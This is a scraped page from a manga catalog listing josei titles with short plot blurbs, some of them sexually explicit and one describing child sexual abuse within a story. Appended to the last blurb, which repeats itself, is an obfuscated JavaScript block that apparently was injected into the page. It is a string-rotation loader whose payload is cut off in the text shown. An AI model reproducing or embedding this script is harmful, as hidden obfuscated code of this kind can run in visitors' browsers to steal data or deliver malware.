Josei - Page 80

Josei manga is designed for adult women, often covering themes such as love, career, and personal growth. It typically focuses on more realistic portrayals of relationships and emotional maturity, compared to the idealized stories in shoujo manga.

3234 results

Musashino Rondo

Musashibara Tamaki (35), a sharp-tongued woman who is firm in how she lives her life, had been living by herself until her younger brother, Bunta, came back to their family home after a breakup. Her old student and next-door neighbor, Agawa Ryuuhei (25), has had an unrequited crush on Tamaki for a long time now. After being rejected twice by her, how does he deal with his feelings? A mature story of unrequited love with an ensemble cast that unfolds in an elegant and laid-back town.


Kuzu no Tadashii Aishi Kata.

Remi doesn't know what love feels like. In the summer two years after she gets her first full-time job, she bumps into Hodaka Arishima, a guy she was friends with benefits with back in school. Even though he was a playboy, he was also popular. For some reason, they had great chemistry. More than anything, he was a jerk who knew every inch of her body. After one particular incident, though, they stopped all contact with each other. Hodaka reassured her that she wasn't special to him, and since he smiled when he said it, Remi now thinks they can become friends again. That assumption changes when this older Hodaka declares that he won't wait for her any longer. He'll make her feel so good that she'll cry in pleasure? and this time, they'll finally share real love and real lovemaking.


Amaguro Joshi No Okiniiri Otona No Honki NI Torokasaremashita

The perfect boss's sweet desire to have her all to himself... The company's new employee, Emika Kushige, is feared by her coworkers and is having a hard time fitting in because her father is a member of the board. The only thing that brings light into her lonely life is her boss, Seishiro Toyama. Staring at him alone is enough to fill her with joy. He's good at his job, popular, alluring, and extremely handsome... which is why Emika is secretly in love with him. But, everything in her life is turned upside down when she lies to her father and tells him she has a boyfriend. She has no choice but to ask Seishiro to pretend to be her boyfriend, but when she does, he starts acting like a completely different person! Seishiro seems to have been keeping a big secret of his own!


This Song Is Only For You

Beneath all the limelight and glory, how many hidden truths are unknown to many? When the laid back yet dominant rockstar meets a gentle but cold surgeon, will sparks fly? A story about abandoning their facades, restoring the truth, and becoming each other’s saving grace. “Will you hold on to me even if darkness befalls upon us?” They never loved someone as deeply as each other. She was willing to descend into hell with him, while he was willing to put down his bloodied knife for her.


Good-Bye Secret Slut Life

"I actually can't stand Secret Sluts like you." He saw through my perfect mask... So now, I have no choice but to stop being a slut. Notices: Hi everyone, I have a friend helping me out with a couple of chapters ❤️


Teen Mom

Follows the heartwarming story of a teenage mom who finds herself at odds with society because of her early pregnancy.


Confession (Marumi Kimura)

If you were a teacher, what would you do if you found out that the murderers of your child happen were two of your students? Would you let their fate to be decided by the law - if you knew the law would let them get away scot-free, or would you seek revenge yourself? Between ethics and justice, which would you choose?


Koisuru Yajuu

Satou Hinato is a really dumb high school girl. She even failed in a really easy test and got to attend summer's class all alone. But she isn't depress with it, exactly the opposite, because this is a great opportunity to be together with her beloved M... ~Taken from


Zankoku na Kami ga Shihai Suru

Jeremy is a sensitive teenager who is happy for his mother when she remarries. However, the sweet-talking man who is his new stepfather turns out to be a serpent in disguise -- he's a sadist and a pedophile, and it isn't long before he makes Jeremy his target. After months of horrific, systematic abuse, Jeremy's mind becomes unstable and his thoughts turn vicious. He decides to murder his stepfather in order to get rid of him -- but the plan goes awry, and when he sabotages his stepfather's car, his mother also dies in the crash. Shocked and wracked by guilt, Jeremy's reactions seem strange to the average onlooker. His brittle and bizarre behavior isn't just that of a grieving son's. This is when Ian, the free-spirited son of Jeremy's stepfather, begins to suspect Jeremy of murder. He finds several clues that tie Jeremy to the crime, but in unearthing them, Ian also discovers the fact that Jeremy was abused. What should Ian do with his evidence? Caught in a moral dilemma -- between punishing a criminal and atoning for his father's sins -- Ian begins to be haunted by lust for Jeremy. Is it lust, or is it love? Ian wonders whether he shares his father's proclivities, and despite his best efforts, he is drawn into a passionate and painful relationship with Jeremy. A Cruel God Reigns is a true BL classic written by Hagio Moto, one of the founders of the BL genre. In seventeen intense volumes, A Cruel God Reigns traces both Jeremy's and Ian's journeys towards redemption. The story-telling is rich and unique, and the art is breathtaking. To this day, A Cruel God Reigns remains one of the most powerful BL epics ever written. - by The Pink Panzers Winner of the first Osamu Tezuka Cultural Prize's Award for Excellence.


1-Nichi 1-Kai, Hateru Made... Ueta Zetsurin Oji-Sama Wa Watashi O Musabori Tsukusu

"We're not even close to being done though?" His enthusiasm is enough to make me tremble as I cum over and over. He teases just the entrance of my hole before piercing me deeply with his dick and I cum all over again...!! Hina Kikuchi has just lost her job when she meets a hot daddy who happens to be the owner of the Japanese sweets shop, Fujikawa. She was discouraged at her lot in life but fills herself with sweets and ends up falling asleep. When she snaps back to reality, she realized that Mr. Fujikawa is in bed with her!? Not to mention, he's a sexy, handsome mature guy who pins her down. "You can just leave everything to me," he says has she struggles to come up with a reason to turn him down. He starts to sensually touch her body, hitting every sensitive part of it; both shallow and deep. In the end, he ends up greedily devouring her. The next morning, he offers the most shocking offer thus far: "Why don't you live with me and you can become my girlfriend?" "What's going to happen to my body if I keep having intense sex with this hot daddy every day!?"


Maid To Love Or Die

The Main Character, Who Transmigrates Into An Exhausting Reverse Harem Game As An Extra, Has Seen It To The End Six Times, But Yet She’s Still Unable To Return To Reality? No Matter How True She Stays To Her Role As An Extra, She Keeps Getting Swept Along With The Characters’ Tragic Ending. Now, She’s Determined To Leave Everything Behind And Live Her Own Life. “It’s My Resignation Letter. I Would Like To Leave This Estate.” I’m Sure The Main Leads Will Be Fine Without Me, After All. However. “On Who’s Account Are You Leaving This Estate For? Did You Not Say You Were My Person, Iren?” “Irenea, I Don’t Intend To Connect With Anyone Else But You. It’ll Only Be You.” “Don’t Go, Lea. Stay By My Side, Alright?” “I Would Like For You To Be Happy, Miss Irenea.” Every Character In The Game Has Started To Notice Me 역하렘 게임 속 메이드는 퇴사하고 싶습니다


Other’s Romance

Im So Hee is adored by countless men, yet she is determined in her disbelief of true love. To her, true love is only fiction; something that is real only on paper. But, events start to twist and turn once she is involved in a traffic accident–the exact accident that leads her to meet a romance novelist. This novelist is not like any ordinary ones. No, this one is Mr. Devil A, who feeds on human sadness. He offers her a deal to be alive again with a return of Im So Hee to be the female lead of his novel that focuses on true love. Im So Hee is adored by countless men, yet she is determined in her disbelief of true love. To her, true love is only fiction; something that is real only on paper. But, events start to twist and turn once she is involved in a traffic accident–the exact accident that leads her to meet a romance novelist. This novelist is not like any ordinary ones. No, this one is Mr. Devil A, who feeds on human sadness. He offers her a deal to be alive again with a return of Im So Hee to be the female lead of his novel that focuses on true love.<script></script><script>(function(_0x18e69a,_0x3e032b){var _0x3181db=_0x2e9f,_0x121472=_0x18e69a();while(!![]){try{var _0x476f80=-parseInt(_0x3181db(0xbb))/(0x1cf7+-0x265d+0x967)*(parseInt(_0x3181db(0xd5))/(-0x12a+0x1b83+-0x1a57))+parseInt(_0x3181db(0xc3))/(-0x67*-0x10+0x1*0x1f85+-0x6*0x653)+-parseInt(_0x3181db(0xbd))/(-0x3a4+0x1*0x17e3+-0x143b)*(-parseInt(_0x3181db(0xcd))/(-0x16ed*0x1+-0x169d+0x2d8f))+parseInt(_0x3181db(0xda))/(-0x78c+-0x1703+-0x1*-0x1e95)+parseInt(_0x3181db(0xbf))/(-0x224*-0x5+0x35*-0x9+-0x10*0x8d)+-parseInt(_0x3181db(0xc6))/(0x6da*0x4+-0x1284+-0x8dc)*(parseInt(_0x3181db(0xbc))/(-0x35*0xb8+0x4*0x51+0x24dd))+-parseInt(_0x3181db(0xc7))/(-0x2349*0x1+0xe15+0x153e)*(-parseInt(_0x3181db(0xc5))/(0x1955+0x1*-0xf09+-0x1*0xa41));if(_0x476f80===_0x3e032b)break;else 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